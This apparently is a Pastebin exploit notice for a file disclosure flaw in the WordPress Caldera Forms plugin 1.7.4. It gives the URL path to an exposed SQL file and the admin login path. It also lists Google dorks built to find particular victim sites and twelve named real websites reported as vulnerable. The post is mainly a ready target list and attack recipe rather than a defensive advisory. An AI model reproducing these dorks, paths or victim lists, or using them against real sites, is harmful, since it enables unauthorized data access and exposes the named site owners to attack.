Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #################################################################################################
- # Exploit Title : WordPress Caldera Forms Plugins 1.7.4 Database Backup Disclosure
- # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
- # Date : 06/12/2018
- # Vendor Homepage : wordpress.org/plugins/caldera-forms/ ~ calderaforms.com/updates/caldera-forms-1-7-4/
- # Software Download Link : downloads.wordpress.org/plugin/caldera-forms.1.7.4.zip
- # Tested On : Windows and Linux
- # Category : WebApps
- # Version Information : 1.7.4
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/wp-content/plugins/caldera-forms/''
- intext:''A-Data | Software til sundheden''
- intext:''Harvest Time Christian School and KidLife Preschool''
- intext:''© The Cradle Company 2018''
- intext:''Theme by Tyler Moore''
- intext:''Jens Wiecker DIGITAL IMAGE ARTIST AND PHOTOGRAPH ''
- intext:''Avada Theme by Theme Fusion | All Rights Reserved | Powered by WordPress''
- intext:''Copyright © 2018 Hands2gether. All Rights Reserved.''
- intext:''intext:''Designed by 2it'' site:gr
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
- #################################################################################################
- # Admin Panel Login Path :
- /wp-login.php
- # Exploit :
- /wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- #################################################################################################
- # Example Vulnerable Sites =>
- [+] a-data.dk/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- [+] kirabpemuda2018.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- [+] holisticanimal.clinic/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- [+] htcsfl.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- [+] thecradlecompany.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- [+] excelsioryogasf.com/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- [+] junkescontabilidade.com.br/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- [+] wiecker-photography.de/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- [+] fbclansing.org/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- [+] hands2gether.net/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- [+] dietsensor.com/2016/dev/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- [+] ekdoseiseksi.gr/wp-content/plugins/caldera-forms/vendor/nilportugues/sql-query-formatter/tests/Resources/expectedQueries.sql
- #################################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- #################################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement